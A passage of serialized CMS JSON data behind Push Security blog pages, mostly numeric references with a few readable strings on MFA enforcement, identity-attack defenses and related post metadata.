saving money.",[],{},{"nodeType":254,"data":157447,"content":157448},{},[157449],{"nodeType":178,"data":157450,"content":157451},{},[157452,157457],{"nodeType":173,"value":157453,"marks":157454,"data":157456},"Build an approved apps list",[157455],{"type":370},{},{"nodeType":173,"value":157458,"marks":157459,"data":157460}," in your company wiki, synced from Push’s source of truth.",[],{},{"nodeType":178,"data":157462,"content":157463},{},[157464],{"nodeType":173,"value":157465,"marks":157466,"data":157467},"If you’ve made it this far, congratulations! You did not die of identity attacks.",[],{},{"nodeType":312,"data":157469,"content":157473},{"target":157470},{"sys":157471},{"id":157472,"type":317,"linkType":318},"4B7JIz8Iy7kp83vWLEVgOw",[],{"nodeType":178,"data":157475,"content":157476},{},[157477],{"nodeType":173,"value":37,"marks":157478,"data":157479},[],{},"River crossing: What you can accomplish in your first 90 days with Push Security","We’ve put together the following guide for intrepid security teams as they use Push to secure against modern identity attacks.","2024-12-09T00:00:00.000Z","navigating-your-first-90-days-with-push",{"items":157485},[157486],{"sys":157487,"name":26137},{"id":26136},{"items":157489},[157490],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":157491},{"url":2911},{"items":157493},[157494],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":157495},{"url":2911},{"json":157497,"links":158054},{"nodeType":165,"data":157498,"content":157499},{},[157500,157505,157508,157514,157535,157560,157569,157585,157591,157596,157602,157615,157621,157624,157630,157636,157652,157658,157698,157704,157709,157714,157720,157750,157763,157766,157772,157778,157784,157790,157796,157802,157808,157901,157906,157919,157925,157938,157968,157981,157987,158000,158005,158011,158017,158022,158028,158033,158039],{"nodeType":312,"data":157501,"content":157504},{"target":157502},{"sys":157503},{"id":71188,"type":317,"linkType":318},[],{"nodeType":231,"data":157506,"content":157507},{},[],{"nodeType":178,"data":157509,"content":157510},{},[157511],{"nodeType":173,"value":71197,"marks":157512,"data":157513},[],{},{"nodeType":250,"data":157515,"content":157516},{},[157517,157526],{"nodeType":254,"data":157518,"content":157519},{},[157520],{"nodeType":178,"data":157521,"content":157522},{},[157523],{"nodeType":173,"value":71210,"marks":157524,"data":157525},[],{},{"nodeType":254,"data":157527,"content":157528},{},[157529],{"nodeType":178,"data":157530,"content":157531},{},[157532],{"nodeType":173,"value":71220,"marks":157533,"data":157534},[],{},{"nodeType":178,"data":157536,"content":157537},{},[157538,157541,157548,157551,157557],{"nodeType":173,"value":71227,"marks":157539,"data":157540},[],{},{"nodeType":186,"data":157542,"content":157543},{"uri":1297},[157544],{"nodeType":173,"value":71234,"marks":157545,"data":157547},[157546],{"type":194},{},{"nodeType":173,"value":71239,"marks":157549,"data":157550},[],{},{"nodeType":186,"data":157552,"content":157553},{"uri":71244},[157554],{"nodeType":173,"value":71247,"marks":157555,"data":157556},[],{},{"nodeType":173,"value":71251,"marks":157558,"data":157559},[],{},{"nodeType":3769,"data":157561,"content":157562},{},[157563],{"nodeType":178,"data":157564,"content":157565},{},[157566],{"nodeType":173,"value":71261,"marks":157567,"data":157568},[],{},{"nodeType":178,"data":157570,"content":157571},{},[157572,157575,157582],{"nodeType":173,"value":71268,"marks":157573,"data":157574},[],{},{"nodeType":186,"data":157576,"content":157577},{"uri":819},[157578],{"nodeType":173,"value":71275,"marks":157579,"data":157581},[157580],{"type":194},{},{"nodeType":173,"value":71280,"marks":157583,"data":157584},[],{},{"nodeType":178,"data":157586,"content":157587},{},[157588],{"nodeType":173,"value":71287,"marks":157589,"data":157590},[],{},{"nodeType":312,"data":157592,"content":157595},{"target":157593},{"sys":157594},{"id":71294,"type":317,"linkType":318},[],{"nodeType":178,"data":157597,"content":157598},{},[157599],{"nodeType":173,"value":71300,"marks":157600,"data":157601},[],{},{"nodeType":178,"data":157603,"content":157604},{},[157605,157608,157612],{"nodeType":173,"value":71307,"marks":157606,"data":157607},[],{},{"nodeType":173,"value":2570,"marks":157609,"data":157611},[157610],{"type":370},{},{"nodeType":173,"value":71315,"marks":157613,"data":157614},[],{},{"nodeType":178,"data":157616,"content":157617},{},[157618],{"nodeType":173,"value":71322,"marks":157619,"data":157620},[],{},{"nodeType":231,"data":157622,"content":157623},{},[],{"nodeType":169,"data":157625,"content":157626},{},[157627],{"nodeType":173,"value":71332,"marks":157628,"data":157629},[],{},{"nodeType":178,"data":157631,"content":157632},{},[157633],{"nodeType":173,"value":71339,"marks":157634,"data":157635},[],{},{"nodeType":178,"data":157637,"content":157638},{},[157639,157642,157649],{"nodeType":173,"value":71346,"marks":157640,"data":157641},[],{},{"nodeType":186,"data":157643,"content":157644},{"uri":71351},[157645],{"nodeType":173,"value":71354,"marks":157646,"data":157648},[157647],{"type":194},{},{"nodeType":173,"value":1477,"marks":157650,"data":157651},[],{},{"nodeType":178,"data":157653,"content":157654},{},[157655],{"nodeType":173,"value":71365,"marks":157656,"data":157657},[],{},{"nodeType":250,"data":157659,"content":157660},{},[157661,157670,157679],{"nodeType":254,"data":157662,"content":157663},{},[157664],{"nodeType":178,"data":157665,"content":157666},{},[157667],{"nodeType":173,"value":71378,"marks":157668,"data":157669},[],{},{"nodeType":254,"data":157671,"content":157672},{},[157673],{"nodeType":178,"data":157674,"content":157675},{},[157676],{"nodeType":173,"value":71388,"marks":157677,"data":157678},[],{},{"nodeType":254,"data":157680,"content":157681},{},[157682],{"nodeType":178,"data":157683,"content":157684},{},[157685,157688,157695],{"nodeType":173,"value":71398,"marks":157686,"data":157687},[],{},{"nodeType":186,"data":157689,"content":157690},{"uri":61157},[157691],{"nodeType":173,"value":71405,"marks":157692,"data":157694},[157693],{"type":194},{},{"nodeType":173,"value":71410,"marks":157696,"data":157697},[],{},{"nodeType":178,"data":157699,"content":157700},{},[157701],{"nodeType":173,"value":71417,"marks":157702,"data":157703},[],{},{"nodeType":312,"data":157705,"content":157708},{"target":157706},{"sys":157707},{"id":71424,"type":317,"linkType":318},[],{"nodeType":312,"data":157710,"content":157713},{"target":157711},{"sys":157712},{"id":71430,"type":317,"linkType":318},[],{"nodeType":178,"data":157715,"content":157716},{},[157717],{"nodeType":173,"value":71436,"marks":157718,"data":157719},[],{},{"nodeType":250,"data":157721,"content":157722},{},[157723,157732,157741],{"nodeType":254,"data":157724,"content":157725},{},[157726],{"nodeType":178,"data":157727,"content":157728},{},[157729],{"nodeType":173,"value":71449,"marks":157730,"data":157731},[],{},{"nodeType":254,"data":157733,"content":157734},{},[157735],{"nodeType":178,"data":157736,"content":157737},{},[157738],{"nodeType":173,"value":71459,"marks":157739,"data":157740},[],{},{"nodeType":254,"data":157742,"content":157743},{},[157744],{"nodeType":178,"data":157745,"content":157746},{},[157747],{"nodeType":173,"value":71469,"marks":157748,"data":157749},[],{},{"nodeType":178,"data":157751,"content":157752},{},[157753,157756,157760],{"nodeType":173,"value":71476,"marks":157754,"data":157755},[],{},{"nodeType":173,"value":2570,"marks":157757,"data":157759},[157758],{"type":370},{},{"nodeType":173,"value":1477,"marks":157761,"data":157762},[],{},{"nodeType":231,"data":157764,"content":157765},{},[],{"nodeType":169,"data":157767,"content":157768},{},[157769],{"nodeType":173,"value":71493,"marks":157770,"data":157771},[],{},{"nodeType":178,"data":157773,"content":157774},{},[157775],{"nodeType":173,"value":71500,"marks":157776,"data":157777},[],{},{"nodeType":178,"data":157779,"content":157780},{},[157781],{"nodeType":173,"value":71507,"marks":157782,"data":157783},[],{},{"nodeType":178,"data":157785,"content":157786},{},[157787],{"nodeType":173,"value":71514,"marks":157788,"data":157789},[],{},{"nodeType":178,"data":157791,"content":157792},{},[157793],{"nodeType":173,"value":71521,"marks":157794,"data":157795},[],{},{"nodeType":178,"data":157797,"content":157798},{},[157799],{"nodeType":173,"value":71528,"marks":157800,"data":157801},[],{},{"nodeType":178,"data":157803,"content":157804},{},[157805],{"nodeType":173,"value":71535,"marks":157806,"data":157807},[],{},{"nodeType":250,"data":157809,"content":157810},{},[157811,157827,157836,157859,157882],{"nodeType":254,"data":157812,"content":157813},{},[157814],{"nodeType":178,"data":157815,"content":157816},{},[157817,157820,157824],{"nodeType":173,"value":71548,"marks":157818,"data":157819},[],{},{"nodeType":173,"value":71552,"marks":157821,"data":157823},[157822],{"type":370},{},{"nodeType":173,"value":71557,"marks":157825,"data":157826},[],{},{"nodeType":254,"data":157828,"content":157829},{},[157830],{"nodeType":178,"data":157831,"content":157832},{},[157833],{"nodeType":173,"value":71567,"marks":157834,"data":157835},[],{},{"nodeType":254,"data":157837,"content":157838},{},[157839],{"nodeType":178,"data":157840,"content":157841},{},[157842,157845,157849,157852,157856],{"nodeType":173,"value":71577,"marks":157843,"data":157844},[],{},{"nodeType":173,"value":71581,"marks":157846,"data":157848},[157847],{"type":370},{},{"nodeType":173,"value":71586,"marks":157850,"data":157851},[],{},{"nodeType":173,"value":71590,"marks":157853,"data":157855},[157854],{"type":370},{},{"nodeType":173,"value":1477,"marks":157857,"data":157858},[],{},{"nodeType":254,"data":157860,"content":157861},{},[157862],{"nodeType":178,"data":157863,"content":157864},{},[157865,157868,157872,157875,157879],{"nodeType":173,"value":71604,"marks":157866,"data":157867},[],{},{"nodeType":173,"value":2570,"marks":157869,"data":157871},[157870],{"type":370},{},{"nodeType":173,"value":71612,"marks":157873,"data":157874},[],{},{"nodeType":173,"value":18649,"marks":157876,"data":157878},[157877],{"type":370},{},{"nodeType":173,"value":71620,"marks":157880,"data":157881},[],{},{"nodeType":254,"data":157883,"content":157884},{},[157885],{"nodeType":178,"data":157886,"content":157887},{},[157888,157891,157898],{"nodeType":173,"value":71630,"marks":157889,"data":157890},[],{},{"nodeType":186,"data":157892,"content":157893},{"uri":71635},[157894],{"nodeType":173,"value":71638,"marks":157895,"data":157897},[157896],{"type":194},{},{"nodeType":173,"value":1477,"marks":157899,"data":157900},[],{},{"nodeType":312,"data":157902,"content":157905},{"target":157903},{"sys":157904},{"id":71649,"type":317,"linkType":318},[],{"nodeType":178,"data":157907,"content":157908},{},[157909,157912,157916],{"nodeType":173,"value":71655,"marks":157910,"data":157911},[],{},{"nodeType":173,"value":2570,"marks":157913,"data":157915},[157914],{"type":370},{},{"nodeType":173,"value":71663,"marks":157917,"data":157918},[],{},{"nodeType":169,"data":157920,"content":157921},{},[157922],{"nodeType":173,"value":71670,"marks":157923,"data":157924},[],{},{"nodeType":178,"data":157926,"content":157927},{},[157928,157931,157935],{"nodeType":173,"value":71677,"marks":157929,"data":157930},[],{},{"nodeType":173,"value":2570,"marks":157932,"data":157934},[157933],{"type":370},{},{"nodeType":173,"value":71685,"marks":157936,"data":157937},[],{},{"nodeType":250,"data":157939,"content":157940},{},[157941,157950,157959],{"nodeType":254,"data":157942,"content":157943},{},[157944],{"nodeType":178,"data":157945,"content":157946},{},[157947],{"nodeType":173,"value":71698,"marks":157948,"data":157949},[],{},{"nodeType":254,"data":157951,"content":157952},{},[157953],{"nodeType":178,"data":157954,"content":157955},{},[157956],{"nodeType":173,"value":71708,"marks":157957,"data":157958},[],{},{"nodeType":254,"data":157960,"content":157961},{},[157962],{"nodeType":178,"data":157963,"content":157964},{},[157965],{"nodeType":173,"value":71718,"marks":157966,"data":157967},[],{},{"nodeType":178,"data":157969,"content":157970},{},[157971,157974,157978],{"nodeType":173,"value":71725,"marks":157972,"data":157973},[],{},{"nodeType":173,"value":60069,"marks":157975,"data":157977},[157976],{"type":1646},{},{"nodeType":173,"value":71733,"marks":157979,"data":157980},[],{},{"nodeType":178,"data":157982,"content":157983},{},[157984],{"nodeType":173,"value":71740,"marks":157985,"data":157986},[],{},{"nodeType":178,"data":157988,"content":157989},{},[157990,157993,157997],{"nodeType":173,"value":71747,"marks":157991,"data":157992},[],{},{"nodeType":173,"value":18649,"marks":157994,"data":157996},[157995],{"type":370},{},{"nodeType":173,"value":71755,"marks":157998,"data":157999},[],{},{"nodeType":312,"data":158001,"content":158004},{"target":158002},{"sys":158003},{"id":71762,"type":317,"linkType":318},[],{"nodeType":178,"data":158006,"content":158007},{},[158008],{"nodeType":173,"value":71768,"marks":158009,"data":158010},[],{},{"nodeType":178,"data":158012,"content":158013},{},[158014],{"nodeType":173,"value":71775,"marks":158015,"data":158016},[],{},{"nodeType":312,"data":158018,"content":158021},{"target":158019},{"sys":158020},{"id":71782,"type":317,"linkType":318},[],{"nodeType":178,"data":158023,"content":158024},{},[158025],{"nodeType":173,"value":71788,"marks":158026,"data":158027},[],{},{"nodeType":312,"data":158029,"content":158032},{"target":158030},{"sys":158031},{"id":71795,"type":317,"linkType":318},[],{"nodeType":169,"data":158034,"content":158035},{},[158036],{"nodeType":173,"value":71801,"marks":158037,"data":158038},[],{},{"nodeType":178,"data":158040,"content":158041},{},[158042,158045,158051],{"nodeType":173,"value":71808,"marks":158043,"data":158044},[],{},{"nodeType":186,"data":158046,"content":158047},{"uri":2886},[158048],{"nodeType":173,"value":71815,"marks":158049,"data":158050},[],{},{"nodeType":173,"value":71819,"marks":158052,"data":158053},[],{},{"entries":158055},{"hyperlink":158056,"inline":158057,"block":158058},[],[],[158059,158065,158096,158149,158152,158154,158160,158165],{"sys":158060,"__typename":127689,"title":158061,"youTubeUrl":158062,"imagePlaceholder":158063},{"id":71188},"Feature Release: MFA Enforcement","https://www.youtube.com/watch?v=0nu0iD3O3hs",{"url":158064,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/5iUOFCN18UQD38wT1NWbGt/0f8f7bb499134473df52fe68cd747c3c/Youtube_Video_Thumbnail_V2__1_.png",{"sys":158066,"__typename":5311,"content":158067,"name":158095,"title":118},{"id":71294},{"json":158068},{"nodeType":165,"data":158069,"content":158070},{},[158071],{"nodeType":178,"data":158072,"content":158073},{},[158074,158078,158083,158087,158092],{"nodeType":173,"value":158075,"marks":158076,"data":158077},"Typically, ",[],{},{"nodeType":173,"value":158079,"marks":158080,"data":158082},"37% of logins",[158081],{"type":370},{},{"nodeType":173,"value":158084,"marks":158085,"data":158086}," observed by Push upon initial deployment into a new customer environment ",[],{},{"nodeType":173,"value":158088,"marks":158089,"data":158091},"do not use any form of MFA",[158090],{"type":370},{},{"nodeType":173,"value":1477,"marks":158093,"data":158094},[],{},"Typically, 37% of logins observed by Push upon initial deployment into a new customer environment do not use any form of MFA.",{"sys":158097,"__typename":5311,"content":158098,"name":158148,"title":118},{"id":71424},{"json":158099},{"nodeType":165,"data":158100,"content":158101},{},[158102],{"nodeType":178,"data":158103,"content":158104},{},[158105,158108,158116,158120,158125,158129,158134,158140,158145],{"nodeType":173,"value":15816,"marks":158106,"data":158107},[],{},{"nodeType":186,"data":158109,"content":158110},{"uri":4492},[158111],{"nodeType":173,"value":158112,"marks":158113,"data":158115},"recent review",[158114],{"type":194},{},{"nodeType":173,"value":158117,"marks":158118,"data":158119}," by Push Security researchers of a 300,000-account dataset found that ",[],{},{"nodeType":173,"value":158121,"marks":158122,"data":158124},"37% of accounts used a password and had no MFA",[158123],{"type":370},{},{"nodeType":173,"value":158126,"marks":158127,"data":158128},". Meanwhile, ",[],{},{"nodeType":173,"value":158130,"marks":158131,"data":158133},"99% of the accounts ",[158132],{"type":370},{},{"nodeType":173,"value":158135,"marks":158136,"data":158139},"with",[158137,158138],{"type":1646},{"type":370},{},{"nodeType":173,"value":158141,"marks":158142,"data":158144}," MFA used at least 1 phishable method",[158143],{"type":370},{},{"nodeType":173,"value":1477,"marks":158146,"data":158147},[],{},"A recent review by Push Security researchers of a 300,000-account dataset found that 37% of accounts used a password and had no MFA. Meanwhile, 99% of the accounts with MFA used at least 1 phishable method.",{"sys":158150,"__typename":5345,"title":137033,"caption":137034,"layoutMode":118,"file":158151},{"id":71430},{"url":137036,"width":137037,"height":137037},{"sys":158153,"__typename":5434,"title":139946,"arcadeDemoUrl":139947,"playText":5437},{"id":71649},{"sys":158155,"__typename":5345,"title":158156,"caption":158156,"layoutMode":118,"file":158157},{"id":71762},"Configure MFA enforcement for apps",{"url":158158,"width":23880,"height":158159},"https://images.ctfassets.net/y1cdw1ablpvd/7eB1Iargjtx7rL8XDZQTbe/54bb26c3c20685733293b376a6fbcfc5/image2.png",900,{"sys":158161,"__typename":5345,"title":158162,"caption":158162,"layoutMode":118,"file":158163},{"id":71782},"Customize the message seen by your users",{"url":158164,"width":46393,"height":46394},"https://images.ctfassets.net/y1cdw1ablpvd/6vnbTJU4sKYUrLSWAmAzs8/e99e53441d5347f721167fbaa02514f6/image3.png",{"sys":158166,"__typename":5345,"title":158167,"caption":158167,"layoutMode":118,"file":158168},{"id":71795},"No MFA finding cleared once MFA is configured",{"url":158169,"width":158170,"height":158171},"https://images.ctfassets.net/y1cdw1ablpvd/7Gj6yMGjEbXK39P82wI17E/338b2f4ba9f749da560b46ff33b18b48/image1.png",694,781,"content:blog:enforce-mfa-on-third-party-apps.json","blog/enforce-mfa-on-third-party-apps.json","blog/enforce-mfa-on-third-party-apps",{"_path":158176,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":158177,"ogImage":118,"summary":158179,"title":126606,"subtitle":118,"metaTitle":158190,"synopsis":126607,"hashTags":118,"publishedDate":71823,"slug":126608,"tagsCollection":158191,"relatedBlogPostsCollection":158197,"authorsCollection":160634,"content":160638,"_id":161708,"_type":5439,"_source":5440,"_file":161709,"_stem":161710,"_extension":5439},"/blog/push-features-2024",{"id":125444,"publishedAt":158178},"2025-01-16T16:04:58.884Z",{"json":158180},{"data":158181,"content":158182,"nodeType":165},{},[158183],{"data":158184,"content":158185,"nodeType":178},{},[158186],{"data":158187,"marks":158188,"value":158189,"nodeType":173},{},[],"Here’s how in-the-wild attacks and our own R&D inspired what we built over the last year to stop account takeover and reduce security risks across all your workforce identities.","Features we built to stop account takeover in 2024",{"items":158192},[158193,158195],{"sys":158194,"name":509},{"id":508},{"sys":158196,"name":26137},{"id":26136},{"items":158198},[158199,158749,159319],{"__typename":1528,"sys":158200,"content":158201,"title":114081,"synopsis":150597,"hashTags":118,"publishedDate":150598,"slug":114082,"tagsCollection":158741,"authorsCollection":158745},{"id":113695},{"json":158202},{"nodeType":165,"data":158203,"content":158204},{},[158205,158211,158217,158223,158239,158245,158251,158254,158261,158267,158273,158279,158284,158290,158293,158300,158306,158312,158318,158324,158329,158335,158338,158345,158352,158358,158364,158370,158386,158393,158399,158405,158411,158417,158424,158430,158436,158441,158444,158451,158457,158463,158469,158475,158481,158484,158491,158497,158503,158509,158515,158521,158619,158632,158638,158643,158646,158653,158659,158719,158725],{"nodeType":178,"data":158206,"content":158207},{},[158208],{"nodeType":173,"value":149989,"marks":158209,"data":158210},[],{},{"nodeType":178,"data":158212,"content":158213},{},[158214],{"nodeType":173,"value":149996,"marks":158215,"data":158216},[],{},{"nodeType":178,"data":158218,"content":158219},{},[158220],{"nodeType":173,"value":150003,"marks":158221,"data":158222},[],{},{"nodeType":178,"data":158224,"content":158225},{},[158226,158229,158236],{"nodeType":173,"value":150010,"marks":158227,"data":158228},[],{},{"nodeType":186,"data":158230,"content":158231},{"uri":150015},[158232],{"nodeType":173,"value":150018,"marks":158233,"data":158235},[158234],{"type":194},{},{"nodeType":173,"value":1477,"marks":158237,"data":158238},[],{},{"nodeType":178,"data":158240,"content":158241},{},[158242],{"nodeType":173,"value":150029,"marks":158243,"data":158244},[],{},{"nodeType":178,"data":158246,"content":158247},{},[158248],{"nodeType":173,"value":150036,"marks":158249,"data":158250},[],{},{"nodeType":231,"data":158252,"content":158253},{},[],{"nodeType":169,"data":158255,"content":158256},{},[158257],{"nodeType":173,"value":150046,"marks":158258,"data":158260},[158259],{"type":370},{},{"nodeType":178,"data":158262,"content":158263},{},[158264],{"nodeType":173,"value":150054,"marks":158265,"data":158266},[],{},{"nodeType":178,"data":158268,"content":158269},{},[158270],{"nodeType":173,"value":150061,"marks":158271,"data":158272},[],{},{"nodeType":178,"data":158274,"content":158275},{},[158276],{"nodeType":173,"value":150068,"marks":158277,"data":158278},[],{},{"nodeType":312,"data":158280,"content":158283},{"target":158281},{"sys":158282},{"id":150075,"type":317,"linkType":318},[],{"nodeType":178,"data":158285,"content":158286},{},[158287],{"nodeType":173,"value":150081,"marks":158288,"data":158289},[],{},{"nodeType":231,"data":158291,"content":158292},{},[],{"nodeType":169,"data":158294,"content":158295},{},[158296],{"nodeType":173,"value":150091,"marks":158297,"data":158299},[158298],{"type":370},{},{"nodeType":178,"data":158301,"content":158302},{},[158303],{"nodeType":173,"value":150099,"marks":158304,"data":158305},[],{},{"nodeType":178,"data":158307,"content":158308},{},[158309],{"nodeType":173,"value":150106,"marks":158310,"data":158311},[],{},{"nodeType":178,"data":158313,"content":158314},{},[158315],{"nodeType":173,"value":150113,"marks":158316,"data":158317},[],{},{"nodeType":178,"data":158319,"content":158320},{},[158321],{"nodeType":173,"value":150120,"marks":158322,"data":158323},[],{},{"nodeType":312,"data":158325,"content":158328},{"target":158326},{"sys":158327},{"id":150127,"type":317,"linkType":318},[],{"nodeType":178,"data":158330,"content":158331},{},[158332],{"nodeType":173,"value":150133,"marks":158333,"data":158334},[],{},{"nodeType":231,"data":158336,"content":158337},{},[],{"nodeType":169,"data":158339,"content":158340},{},[158341],{"nodeType":173,"value":150143,"marks":158342,"data":158344},[158343],{"type":370},{},{"nodeType":235,"data":158346,"content":158347},{},[158348],{"nodeType":173,"value":150151,"marks":158349,"data":158351},[158350],{"type":370},{},{"nodeType":178,"data":158353,"content":158354},{},[158355],{"nodeType":173,"value":150159,"marks":158356,"data":158357},[],{},{"nodeType":178,"data":158359,"content":158360},{},[158361],{"nodeType":173,"value":150166,"marks":158362,"data":158363},[],{},{"nodeType":178,"data":158365,"content":158366},{},[158367],{"nodeType":173,"value":150173,"marks":158368,"data":158369},[],{},{"nodeType":178,"data":158371,"content":158372},{},[158373,158376,158383],{"nodeType":173,"value":150180,"marks":158374,"data":158375},[],{},{"nodeType":186,"data":158377,"content":158378},{"uri":139925},[158379],{"nodeType":173,"value":150187,"marks":158380,"data":158382},[158381],{"type":194},{},{"nodeType":173,"value":150192,"marks":158384,"data":158385},[],{},{"nodeType":235,"data":158387,"content":158388},{},[158389],{"nodeType":173,"value":150199,"marks":158390,"data":158392},[158391],{"type":370},{},{"nodeType":178,"data":158394,"content":158395},{},[158396],{"nodeType":173,"value":150207,"marks":158397,"data":158398},[],{},{"nodeType":178,"data":158400,"content":158401},{},[158402],{"nodeType":173,"value":150214,"marks":158403,"data":158404},[],{},{"nodeType":178,"data":158406,"content":158407},{},[158408],{"nodeType":173,"value":150221,"marks":158409,"data":158410},[],{},{"nodeType":178,"data":158412,"content":158413},{},[158414],{"nodeType":173,"value":150228,"marks":158415,"data":158416},[],{},{"nodeType":235,"data":158418,"content":158419},{},[158420],{"nodeType":173,"value":150235,"marks":158421,"data":158423},[158422],{"type":370},{},{"nodeType":178,"data":158425,"content":158426},{},[158427],{"nodeType":173,"value":150243,"marks":158428,"data":158429},[],{},{"nodeType":178,"data":158431,"content":158432},{},[158433],{"nodeType":173,"value":150250,"marks":158434,"data":158435},[],{},{"nodeType":312,"data":158437,"content":158440},{"target":158438},{"sys":158439},{"id":150257,"type":317,"linkType":318},[],{"nodeType":231,"data":158442,"content":158443},{},[],{"nodeType":169,"data":158445,"content":158446},{},[158447],{"nodeType":173,"value":150266,"marks":158448,"data":158450},[158449],{"type":370},{},{"nodeType":178,"data":158452,"content":158453},{},[158454],{"nodeType":173,"value":150274,"marks":158455,"data":158456},[],{},{"nodeType":178,"data":158458,"content":158459},{},[158460],{"nodeType":173,"value":150281,"marks":158461,"data":158462},[],{},{"nodeType":178,"data":158464,"content":158465},{},[158466],{"nodeType":173,"value":150288,"marks":158467,"data":158468},[],{},{"nodeType":178,"data":158470,"content":158471},{},[158472],{"nodeType":173,"value":150295,"marks":158473,"data":158474},[],{},{"nodeType":178,"data":158476,"content":158477},{},[158478],{"nodeType":173,"value":150302,"marks":158479,"data":158480},[],{},{"nodeType":231,"data":158482,"content":158483},{},[],{"nodeType":169,"data":158485,"content":158486},{},[158487],{"nodeType":173,"value":150312,"marks":158488,"data":158490},[158489],{"type":370},{},{"nodeType":178,"data":158492,"content":158493},{},[158494],{"nodeType":173,"value":150320,"marks":158495,"data":158496},[],{},{"nodeType":178,"data":158498,"content":158499},{},[158500],{"nodeType":173,"value":150327,"marks":158501,"data":158502},[],{},{"nodeType":178,"data":158504,"content":158505},{},[158506],{"nodeType":173,"value":150334,"marks":158507,"data":158508},[],{},{"nodeType":178,"data":158510,"content":158511},{},[158512],{"nodeType":173,"value":150341,"marks":158513,"data":158514},[],{},{"nodeType":178,"data":158516,"content":158517},{},[158518],{"nodeType":173,"value":150348,"marks":158519,"data":158520},[],{},{"nodeType":250,"data":158522,"content":158523},{},[158524,158543,158562,158581,158600],{"nodeType":254,"data":158525,"content":158526},{},[158527],{"nodeType":178,"data":158528,"content":158529},{},[158530,158533,158540],{"nodeType":173,"value":150361,"marks":158531,"data":158532},[],{},{"nodeType":186,"data":158534,"content":158535},{"uri":125982},[158536],{"nodeType":173,"value":1300,"marks":158537,"data":158539},[158538],{"type":194},{},{"nodeType":173,"value":53584,"marks":158541,"data":158542},[],{},{"nodeType":254,"data":158544,"content":158545},{},[158546],{"nodeType":178,"data":158547,"content":158548},{},[158549,158552,158559],{"nodeType":173,"value":150381,"marks":158550,"data":158551},[],{},{"nodeType":186,"data":158553,"content":158554},{"uri":150386},[158555],{"nodeType":173,"value":150389,"marks":158556,"data":158558},[158557],{"type":194},{},{"nodeType":173,"value":53584,"marks":158560,"data":158561},[],{},{"nodeType":254,"data":158563,"content":158564},{},[158565],{"nodeType":178,"data":158566,"content":158567},{},[158568,158571,158578],{"nodeType":173,"value":150403,"marks":158569,"data":158570},[],{},{"nodeType":186,"data":158572,"content":158573},{"uri":150408},[158574],{"nodeType":173,"value":150411,"marks":158575,"data":158577},[158576],{"type":194},{},{"nodeType":173,"value":53584,"marks":158579,"data":158580},[],{},{"nodeType":254,"data":158582,"content":158583},{},[158584],{"nodeType":178,"data":158585,"content":158586},{},[158587,158590,158597],{"nodeType":173,"value":150425,"marks":158588,"data":158589},[],{},{"nodeType":186,"data":158591,"content":158592},{"uri":125812},[158593],{"nodeType":173,"value":1255,"marks":158594,"data":158596},[158595],{"type":194},{},{"nodeType":173,"value":53584,"marks":158598,"data":158599},[],{},{"nodeType":254,"data":158601,"content":158602},{},[158603],{"nodeType":178,"data":158604,"content":158605},{},[158606,158609,158616],{"nodeType":173,"value":150445,"marks":158607,"data":158608},[],{},{"nodeType":186,"data":158610,"content":158611},{"uri":150450},[158612],{"nodeType":173,"value":96495,"marks":158613,"data":158615},[158614],{"type":194},{},{"nodeType":173,"value":53584,"marks":158617,"data":158618},[],{},{"nodeType":178,"data":158620,"content":158621},{},[158622,158625,158629],{"nodeType":173,"value":150463,"marks":158623,"data":158624},[],{},{"nodeType":173,"value":150467,"marks":158626,"data":158628},[158627],{"type":370},{},{"nodeType":173,"value":150472,"marks":158630,"data":158631},[],{},{"nodeType":178,"data":158633,"content":158634},{},[158635],{"nodeType":173,"value":150479,"marks":158636,"data":158637},[],{},{"nodeType":312,"data":158639,"content":158642},{"target":158640},{"sys":158641},{"id":150486,"type":317,"linkType":318},[],{"nodeType":231,"data":158644,"content":158645},{},[],{"nodeType":169,"data":158647,"content":158648},{},[158649],{"nodeType":173,"value":150495,"marks":158650,"data":158652},[158651],{"type":370},{},{"nodeType":178,"data":158654,"content":158655},{},[158656],{"nodeType":173,"value":150503,"marks":158657,"data":158658},[],{},{"nodeType":250,"data":158660,"content":158661},{},[158662,158691,158710],{"nodeType":254,"data":158663,"content":158664},{},[158665],{"nodeType":178,"data":158666,"content":158667},{},[158668,158671,158678,158681,158688],{"nodeType":173,"value":37,"marks":158669,"data":158670},[],{},{"nodeType":186,"data":158672,"content":158673},{"uri":62639},[158674],{"nodeType":173,"value":150522,"marks":158675,"data":158677},[158676],{"type":194},{},{"nodeType":173,"value":150527,"marks":158679,"data":158680},[],{},{"nodeType":186,"data":158682,"content":158683},{"uri":125749},[158684],{"nodeType":173,"value":150534,"marks":158685,"data":158687},[158686],{"type":194},{},{"nodeType":173,"value":150539,"marks":158689,"data":158690},[],{},{"nodeType":254,"data":158692,"content":158693},{},[158694],{"nodeType":178,"data":158695,"content":158696},{},[158697,158700,158707],{"nodeType":173,"value":37,"marks":158698,"data":158699},[],{},{"nodeType":186,"data":158701,"content":158702},{"uri":4751},[158703],{"nodeType":173,"value":150555,"marks":158704,"data":158706},[158705],{"type":194},{},{"nodeType":173,"value":150560,"marks":158708,"data":158709},[],{},{"nodeType":254,"data":158711,"content":158712},{},[158713],{"nodeType":178,"data":158714,"content":158715},{},[158716],{"nodeType":173,"value":150570,"marks":158717,"data":158718},[],{},{"nodeType":178,"data":158720,"content":158721},{},[158722],{"nodeType":173,"value":150577,"marks":158723,"data":158724},[],{},{"nodeType":178,"data":158726,"content":158727},{},[158728,158731,158738],{"nodeType":173,"value":150584,"marks":158729,"data":158730},[],{},{"nodeType":186,"data":158732,"content":158733},{"uri":1469},[158734],{"nodeType":173,"value":71815,"marks":158735,"data":158737},[158736],{"type":194},{},{"nodeType":173,"value":1477,"marks":158739,"data":158740},[],{},{"items":158742},[158743],{"sys":158744,"name":505},{"id":504},{"items":158746},[158747],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":158748},{"url":1496},{"__typename":1528,"sys":158750,"content":158751,"title":46318,"synopsis":71822,"hashTags":118,"publishedDate":71823,"slug":46319,"tagsCollection":159309,"authorsCollection":159315},{"id":24787},{"json":158752},{"nodeType":165,"data":158753,"content":158754},{},[158755,158760,158763,158769,158790,158815,158824,158840,158846,158851,158857,158870,158876,158879,158885,158891,158907,158913,158953,158959,158964,158969,158975,159005,159018,159021,159027,159033,159039,159045,159051,159057,159063,159156,159161,159174,159180,159193,159223,159236,159242,159255,159260,159266,159272,159277,159283,159288,159294],{"node